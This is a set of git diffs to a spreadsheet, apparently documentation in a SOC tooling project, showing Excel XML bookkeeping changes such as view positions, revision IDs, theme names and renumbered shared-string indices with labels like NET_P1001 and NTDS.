 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="B140" sqref="B140"/>
+    <sheetView tabSelected="1" topLeftCell="A10" workbookViewId="0">
+      <selection activeCell="F8" sqref="F8"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{FFFFD8E5-E407-5446-B91F-88E7D94A6904}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A5E4C128-25C9-984D-B1F4-2C5DAD0C446C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -1303,10 +1303,6 @@
     <t>NET_P3002</t>
   </si>
   <si>
-    <t>NET_P1001
-NET_P1002</t>
-  </si>
-  <si>
     <t>NET_P1004</t>
   </si>
   <si>
@@ -1469,6 +1465,11 @@
   </si>
   <si>
     <t>NTDS</t>
+  </si>
+  <si>
+    <t>NET_P1001
+NET_P1002
+NET_P1004</t>
   </si>
 </sst>
 </file>
@@ -1594,9 +1595,9 @@
 </file>
 
 <file path=xl/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
-<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office 2013 - 2022 Theme">
   <a:themeElements>
-    <a:clrScheme name="Office">
+    <a:clrScheme name="Office 2013 - 2022">
       <a:dk1>
         <a:sysClr val="windowText" lastClr="000000"/>
       </a:dk1>
@@ -1634,7 +1635,7 @@
         <a:srgbClr val="954F72"/>
       </a:folHlink>
     </a:clrScheme>
-    <a:fontScheme name="Office">
+    <a:fontScheme name="Office 2013 - 2022">
       <a:majorFont>
         <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
         <a:ea typeface=""/>
@@ -1740,7 +1741,7 @@
         <a:font script="Tfng" typeface="Ebrima"/>
       </a:minorFont>
     </a:fontScheme>
-    <a:fmtScheme name="Office">
+    <a:fmtScheme name="Office 2013 - 2022">
       <a:fillStyleLst>
         <a:solidFill>
           <a:schemeClr val="phClr"/>
@@ -1882,7 +1883,7 @@
   <a:extraClrSchemeLst/>
   <a:extLst>
     <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
-      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}" vid="{4A3C46E8-61CC-4603-A589-7422A47A8E4A}"/>
+      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office 2013 - 2022 Theme" id="{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}" vid="{4A3C46E8-61CC-4603-A589-7422A47A8E4A}"/>
     </a:ext>
   </a:extLst>
 </a:theme>
@@ -1892,8 +1893,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A10" workbookViewId="0">
-      <selection activeCell="F8" sqref="F8"/>
+    <sheetView tabSelected="1" topLeftCell="A78" workbookViewId="0">
+      <selection activeCell="A94" sqref="A94"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -2436,11 +2437,11 @@
         <v>101</v>
       </c>
       <c r="B34" s="1" t="s">
-        <v>431</v>
+        <v>430</v>
       </c>
       <c r="C34" s="1"/>
       <c r="F34" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="35" spans="1:6" ht="17">
@@ -2448,11 +2449,11 @@
         <v>101</v>
       </c>
       <c r="B35" s="1" t="s">
-        <v>432</v>
+        <v>431</v>
       </c>
       <c r="C35" s="1"/>
       <c r="F35" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="36" spans="1:6" ht="34">
@@ -2460,11 +2461,11 @@
         <v>101</v>
       </c>
       <c r="B36" s="1" t="s">
-        <v>416</v>
+        <v>415</v>
       </c>
       <c r="C36" s="1"/>
       <c r="F36" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="37" spans="1:6" ht="34">
@@ -2472,11 +2473,11 @@
         <v>101</v>
       </c>
       <c r="B37" s="1" t="s">
-        <v>417</v>
+        <v>416</v>
       </c>
       <c r="C37" s="1"/>
       <c r="F37" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="38" spans="1:6" ht="34">
@@ -2484,11 +2485,11 @@
         <v>101</v>
       </c>
       <c r="B38" s="1" t="s">
-        <v>433</v>
+        <v>432</v>
       </c>
       <c r="C38" s="1"/>
       <c r="F38" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="39" spans="1:6" ht="34">
@@ -2496,11 +2497,11 @@
         <v>101</v>
       </c>
       <c r="B39" s="1" t="s">
-        <v>418</v>
+        <v>417</v>
       </c>
       <c r="C39" s="1"/>
       <c r="F39" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="40" spans="1:6" ht="34">
@@ -2508,11 +2509,11 @@
         <v>101</v>
       </c>
       <c r="B40" s="1" t="s">
-        <v>419</v>
+        <v>418</v>
       </c>
       <c r="C40" s="1"/>
       <c r="F40" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="41" spans="1:6" ht="51">
@@ -2520,11 +2521,11 @@
         <v>101</v>
       </c>
       <c r="B41" s="1" t="s">
-        <v>420</v>
+        <v>419</v>
       </c>
       <c r="C41" s="1"/>
       <c r="F41" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="42" spans="1:6" ht="34">
@@ -2532,11 +2533,11 @@
         <v>101</v>
       </c>
       <c r="B42" s="1" t="s">
-        <v>421</v>
+        <v>420</v>
       </c>
       <c r="C42" s="1"/>
       <c r="F42" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="43" spans="1:6" ht="51">
@@ -2544,11 +2545,11 @@
         <v>101</v>
       </c>
       <c r="B43" s="1" t="s">
-        <v>422</v>
+        <v>421</v>
       </c>
       <c r="C43" s="1"/>
       <c r="F43" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="44" spans="1:6" ht="17">
@@ -2556,11 +2557,11 @@
         <v>101</v>
       </c>
       <c r="B44" s="1" t="s">
-        <v>423</v>
+        <v>422</v>
       </c>
       <c r="C44" s="1"/>
       <c r="F44" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="45" spans="1:6" ht="34">
@@ -2568,11 +2569,11 @@
         <v>101</v>
       </c>
       <c r="B45" s="1" t="s">
-        <v>434</v>
+        <v>433</v>
       </c>
       <c r="C45" s="1"/>
       <c r="F45" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="46" spans="1:6" ht="34">
@@ -2580,11 +2581,11 @@
         <v>101</v>
       </c>
       <c r="B46" s="1" t="s">
-        <v>424</v>
+        <v>423</v>
       </c>
       <c r="C46" s="1"/>
       <c r="F46" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="47" spans="1:6" ht="34">
@@ -2592,11 +2593,11 @@
         <v>101</v>
       </c>
       <c r="B47" s="1" t="s">
-        <v>425</v>
+        <v>424</v>
       </c>
       <c r="C47" s="1"/>
       <c r="F47" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="48" spans="1:6" ht="34">
@@ -2604,11 +2605,11 @@
         <v>101</v>
       </c>
       <c r="B48" s="1" t="s">
-        <v>426</v>
+        <v>425</v>
       </c>
       <c r="C48" s="1"/>
       <c r="F48" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="49" spans="1:6" ht="34">
@@ -2616,11 +2617,11 @@
         <v>101</v>
       </c>
       <c r="B49" s="1" t="s">
-        <v>427</v>
+        <v>426</v>
       </c>
       <c r="C49" s="1"/>
       <c r="F49" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="50" spans="1:6" ht="34">
@@ -2628,11 +2629,11 @@
         <v>101</v>
       </c>
       <c r="B50" s="1" t="s">
-        <v>428</v>
+        <v>427</v>
       </c>
       <c r="C50" s="1"/>
       <c r="F50" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="51" spans="1:6" ht="34">
@@ -2640,11 +2641,11 @@
         <v>101</v>
       </c>
       <c r="B51" s="1" t="s">
-        <v>435</v>
+        <v>434</v>
       </c>
       <c r="C51" s="1"/>
       <c r="F51" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="52" spans="1:6" ht="17">
@@ -2652,11 +2653,11 @@
         <v>101</v>
       </c>
       <c r="B52" s="1" t="s">
-        <v>436</v>
+        <v>435</v>
       </c>
       <c r="C52" s="1"/>
       <c r="F52" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="53" spans="1:6" ht="34">
@@ -2664,11 +2665,11 @@
         <v>101</v>
       </c>
       <c r="B53" s="1" t="s">
-        <v>429</v>
+        <v>428</v>
       </c>
       <c r="C53" s="1"/>
       <c r="F53" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="54" spans="1:6" ht="34">
@@ -2676,11 +2677,11 @@
         <v>101</v>
       </c>
       <c r="B54" s="1" t="s">
-        <v>430</v>
+        <v>429</v>
       </c>
       <c r="C54" s="1"/>
       <c r="F54" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="55" spans="1:6" ht="17">
@@ -2688,11 +2689,11 @@
         <v>101</v>
       </c>
       <c r="B55" s="1" t="s">
-        <v>437</v>
+        <v>436</v>
       </c>
       <c r="C55" s="1"/>
       <c r="F55" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="56" spans="1:6" ht="17">
@@ -2700,11 +2701,11 @@
         <v>101</v>
       </c>
       <c r="B56" s="1" t="s">
-        <v>438</v>
+        <v>437</v>
       </c>
       <c r="C56" s="1"/>
       <c r="F56" t="s">
-        <v>439</v>
+        <v>438</v>
       </c>
     </row>
     <row r="57" spans="1:6" ht="17">
@@ -3059,7 +3060,7 @@
     </row>
     <row r="79" spans="1:6" ht="68">
       <c r="A79" t="s">
-        <v>440</v>
+        <v>439</v>
       </c>
       <c r="B79" s="1" t="s">
         <v>352</v>
@@ -3074,7 +3075,7 @@
     </row>
     <row r="80" spans="1:6" ht="17">
       <c r="A80" t="s">
-        <v>393</v>
+        <v>392</v>
       </c>
       <c r="B80" s="1" t="s">
         <v>166</v>
@@ -3091,7 +3092,7 @@
     </row>
     <row r="81" spans="1:6" ht="17">
       <c r="A81" t="s">
-        <v>397</v>
+        <v>396</v>
       </c>
       <c r="B81" s="1" t="s">
         <v>257</v>
@@ -3108,7 +3109,7 @@
     </row>
     <row r="82" spans="1:6" ht="17">
       <c r="A82" t="s">
-        <v>397</v>
+        <v>396</v>
       </c>
       <c r="B82" s="1" t="s">
         <v>257</v>
@@ -3123,7 +3124,7 @@
     </row>
     <row r="83" spans="1:6" ht="17">
       <c r="A83" t="s">
-        <v>398</v>
+        <v>397</v>
       </c>
       <c r="B83" s="1" t="s">
         <v>359</v>
@@ -3138,7 +3139,7 @@
     </row>
     <row r="84" spans="1:6" ht="136">
       <c r="A84" t="s">
-        <v>403</v>
+        <v>402</v>
       </c>
       <c r="B84" s="1" t="s">
         <v>324</v>
@@ -3153,7 +3154,7 @@
     </row>
     <row r="85" spans="1:6" ht="34">
       <c r="A85" t="s">
-        <v>402</v>
+        <v>401</v>
       </c>
       <c r="B85" s="1" t="s">
         <v>377</v>
@@ -3168,7 +3169,7 @@
     </row>
     <row r="86" spans="1:6" ht="34">
       <c r="A86" s="1" t="s">
-        <v>401</v>
+        <v>400</v>
       </c>
       <c r="B86" s="1" t="s">
         <v>143</v>
@@ -3185,7 +3186,7 @@
     </row>
     <row r="87" spans="1:6" ht="34">
       <c r="A87" s="1" t="s">
-        <v>401</v>
+        <v>400</v>
       </c>
       <c r="B87" s="1" t="s">
         <v>142</v>
@@ -3285,9 +3286,9 @@
         <v>150</v>
       </c>
     </row>
-    <row r="93" spans="1:6" ht="34">
+    <row r="93" spans="1:6" ht="51">
       <c r="A93" s="1" t="s">
-        <v>390</v>
+        <v>440</v>
       </c>
       <c r="B93" s="1" t="s">
         <v>364</v>
@@ -3302,7 +3303,7 @@
     </row>
     <row r="94" spans="1:6" ht="102">
       <c r="A94" s="1" t="s">
-        <v>400</v>
+        <v>399</v>
       </c>
       <c r="B94" s="1" t="s">
         <v>302</v>
@@ -3317,7 +3318,7 @@
     </row>
     <row r="95" spans="1:6" ht="51">
       <c r="A95" s="1" t="s">
-        <v>392</v>
+        <v>391</v>
       </c>
       <c r="B95" s="1" t="s">
         <v>332</v>
@@ -3332,7 +3333,7 @@
     </row>
     <row r="96" spans="1:6" ht="68">
       <c r="A96" s="1" t="s">
-        <v>399</v>
+        <v>398</v>
       </c>
       <c r="B96" s="1" t="s">
         <v>321</v>
@@ -3364,7 +3365,7 @@
     </row>
     <row r="98" spans="1:6" ht="17">
       <c r="A98" t="s">
-        <v>391</v>
+        <v>390</v>
       </c>
       <c r="B98" s="1" t="s">
         <v>164</v>
@@ -3396,7 +3397,7 @@
     </row>
     <row r="100" spans="1:6" ht="68">
       <c r="A100" s="1" t="s">
-        <v>394</v>
+        <v>393</v>
       </c>
       <c r="B100" s="1" t="s">
         <v>346</v>
@@ -3445,7 +3446,7 @@
     </row>
     <row r="103" spans="1:6" ht="17">
       <c r="A103" t="s">
-        <v>395</v>
+        <v>394</v>
       </c>
       <c r="B103" s="1" t="s">
         <v>227</v>
@@ -3460,7 +3461,7 @@
     </row>
     <row r="104" spans="1:6" ht="17">
       <c r="A104" t="s">
-        <v>395</v>
+        <v>394</v>
       </c>
       <c r="B104" s="1" t="s">
         <v>226</v>
@@ -3475,7 +3476,7 @@
     </row>
     <row r="105" spans="1:6" ht="17">
       <c r="A105" t="s">
-        <v>396</v>
+        <v>395</v>
       </c>
       <c r="B105" s="1" t="s">
         <v>188</v>
@@ -3490,7 +3491,7 @@
     </row>
     <row r="106" spans="1:6" ht="17">
       <c r="A106" t="s">
-        <v>404</v>
+        <v>403</v>
       </c>
       <c r="B106" s="1" t="s">
         <v>44</v>
@@ -3569,7 +3570,7 @@
     </row>
     <row r="111" spans="1:6" ht="17">
       <c r="A111" s="3" t="s">
-        <v>415</v>
+        <v>414</v>
       </c>
       <c r="B111" s="1" t="s">
         <v>378</v>
@@ -3584,7 +3585,7 @@
     </row>
     <row r="112" spans="1:6" ht="34">
       <c r="A112" t="s">
-        <v>410</v>
+        <v>409</v>
       </c>
       <c r="B112" s="1" t="s">
         <v>174</v>
@@ -3601,7 +3602,7 @@
     </row>
     <row r="113" spans="1:6" ht="17">
       <c r="A113" t="s">
-        <v>412</v>
+        <v>411</v>
       </c>
       <c r="B113" s="1" t="s">
         <v>237</v>
@@ -3618,7 +3619,7 @@
     </row>
     <row r="114" spans="1:6" ht="17">
       <c r="A114" t="s">
-        <v>412</v>
+        <v>411</v>
       </c>
       <c r="B114" s="1" t="s">
         <v>256</v>
@@ -3635,7 +3636,7 @@
     </row>
     <row r="115" spans="1:6" ht="17">
       <c r="A115" t="s">
-        <v>412</v>
+        <v>411</v>
       </c>
       <c r="B115" s="1" t="s">
         <v>289</v>
@@ -3650,7 +3651,7 @@
     </row>
     <row r="116" spans="1:6" ht="17">
       <c r="A116" t="s">
-        <v>412</v>
+        <v>411</v>
       </c>
       <c r="B116" s="1" t="s">
         <v>293</v>
@@ -3665,7 +3666,7 @@
     </row>
     <row r="117" spans="1:6" ht="17">
       <c r="A117" t="s">
-        <v>413</v>
+        <v>412</v>
       </c>
       <c r="B117" s="1" t="s">
         <v>238</v>
@@ -3682,7 +3683,7 @@
     </row>
     <row r="118" spans="1:6" ht="17">
       <c r="A118" t="s">
-        <v>413</v>
+        <v>412</v>
       </c>
       <c r="B118" s="1" t="s">
         <v>255</v>
@@ -3699,7 +3700,7 @@
     </row>
     <row r="119" spans="1:6" ht="17">
       <c r="A119" t="s">
-        <v>413</v>
+        <v>412</v>
       </c>
       <c r="B119" s="1" t="s">
         <v>288</v>
@@ -3714,7 +3715,7 @@
     </row>
     <row r="120" spans="1:6" ht="17">
       <c r="A120" t="s">
-        <v>413</v>
+        <v>412</v>
       </c>
       <c r="B120" s="1" t="s">
         <v>294</v>
@@ -3729,7 +3730,7 @@
     </row>
     <row r="121" spans="1:6" ht="34">
       <c r="A121" t="s">
-        <v>411</v>
+        <v>410</v>
       </c>
       <c r="B121" s="1" t="s">
         <v>116</v>
@@ -3746,7 +3747,7 @@
     </row>
     <row r="122" spans="1:6" ht="17">
       <c r="A122" t="s">
-        <v>411</v>
+        <v>410</v>
       </c>
       <c r="B122" s="1" t="s">
         <v>171</v>
@@ -3763,7 +3764,7 @@
     </row>
     <row r="123" spans="1:6" ht="17">
       <c r="A123" s="1" t="s">
-        <v>411</v>
+        <v>410</v>
       </c>
       <c r="B123" s="1" t="s">
         <v>236</v>
@@ -3780,7 +3781,7 @@
     </row>
     <row r="124" spans="1:6" ht="51">
       <c r="A124" s="1" t="s">
-        <v>414</v>
+        <v>413</v>
       </c>
       <c r="B124" s="1" t="s">
         <v>350</v>
@@ -3840,7 +3841,7 @@
     </row>
     <row r="128" spans="1:6" ht="17">
       <c r="A128" t="s">
-        <v>407</v>
+        <v>406</v>
       </c>
       <c r="B128" s="1" t="s">
         <v>63</v>
@@ -3857,7 +3858,7 @@
     </row>
     <row r="129" spans="1:6" ht="17">
       <c r="A129" t="s">
-        <v>407</v>
+        <v>406</v>
       </c>
       <c r="B129" s="1" t="s">
         <v>176</v>
@@ -3874,7 +3875,7 @@
     </row>
     <row r="130" spans="1:6" ht="17">
       <c r="A130" t="s">
-        <v>407</v>
+        <v>406</v>
       </c>
       <c r="B130" s="1" t="s">
         <v>191</v>
@@ -3891,7 +3892,7 @@
     </row>
     <row r="131" spans="1:6" ht="17">
       <c r="A131" t="s">
-        <v>407</v>
+        <v>406</v>
       </c>
       <c r="B131" s="1" t="s">
         <v>360</v>
@@ -3906,7 +3907,7 @@
     </row>
     <row r="132" spans="1:6" ht="17">
       <c r="A132" s="4" t="s">
-        <v>405</v>
+        <v>404</v>
       </c>
       <c r="B132" s="1" t="s">
         <v>178</v>
@@ -3923,7 +3924,7 @@
     </row>
     <row r="133" spans="1:6" ht="17">
       <c r="A133" t="s">
-        <v>405</v>
+        <v>404</v>
       </c>
       <c r="B133" s="1" t="s">
         <v>192</v>
@@ -3940,7 +3941,7 @@
     </row>
     <row r="134" spans="1:6" ht="17">
       <c r="A134" s="4" t="s">
-        <v>405</v>
+        <v>404</v>
       </c>
       <c r="B134" s="1" t="s">
         <v>322</v>
@@ -3955,7 +3956,7 @@
     </row>
     <row r="135" spans="1:6" ht="17">
       <c r="A135" t="s">
-        <v>405</v>
+        <v>404</v>
       </c>
       <c r="B135" s="1" t="s">
         <v>322</v>
@@ -3970,7 +3971,7 @@
     </row>
     <row r="136" spans="1:6" ht="17">
       <c r="A136" t="s">
-        <v>405</v>
+        <v>404</v>
       </c>
       <c r="B136" s="1" t="s">
         <v>322</v>
@@ -3985,7 +3986,7 @@
     </row>
     <row r="137" spans="1:6" ht="51">
       <c r="A137" s="1" t="s">
-        <v>406</v>
+        <v>405</v>
       </c>
       <c r="B137" s="1" t="s">
         <v>303</v>
@@ -4000,7 +4001,7 @@
     </row>
     <row r="138" spans="1:6" ht="34">
       <c r="A138" s="1" t="s">
-        <v>406</v>
+        <v>405</v>
       </c>
       <c r="B138" s="1" t="s">
         <v>331</v>
@@ -4047,7 +4048,7 @@
     </row>
     <row r="141" spans="1:6" ht="17">
       <c r="A141" t="s">
-        <v>408</v>
+        <v>407</v>
       </c>
       <c r="B141" s="1" t="s">
         <v>317</v>
@@ -5226,7 +5227,7 @@
     </row>
     <row r="216" spans="1:6" ht="17">
       <c r="A216" t="s">
-        <v>409</v>
+        <v>408</v>
       </c>
       <c r="B216" s="1" t="s">
         <v>203</v>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,14 +8,14 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A5E4C128-25C9-984D-B1F4-2C5DAD0C446C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{085FFA60-94AA-B64A-85D9-4501B381AE47}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
   <sheets>
     <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
   </sheets>
-  <calcPr calcId="181029"/>
+  <calcPr calcId="191029"/>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
@@ -1893,8 +1893,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A78" workbookViewId="0">
-      <selection activeCell="A94" sqref="A94"/>
+    <sheetView tabSelected="1" topLeftCell="A97" workbookViewId="0">
+      <selection activeCell="B122" sqref="B122"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{085FFA60-94AA-B64A-85D9-4501B381AE47}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{EFC1ECA6-4123-4C4E-962E-F65A45AF4C07}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -1893,8 +1893,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A97" workbookViewId="0">
-      <selection activeCell="B122" sqref="B122"/>
+    <sheetView tabSelected="1" topLeftCell="A109" workbookViewId="0">
+      <selection activeCell="B112" sqref="B112"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{EFC1ECA6-4123-4C4E-962E-F65A45AF4C07}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C292EE1F-BA45-014F-BE16-0561026732D1}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -1893,8 +1893,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F263"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A109" workbookViewId="0">
-      <selection activeCell="B112" sqref="B112"/>
+    <sheetView tabSelected="1" topLeftCell="A183" workbookViewId="0">
+      <selection activeCell="B244" sqref="B244"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C292EE1F-BA45-014F-BE16-0561026732D1}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{186235B5-21AD-164A-822C-5A154C27CCC7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
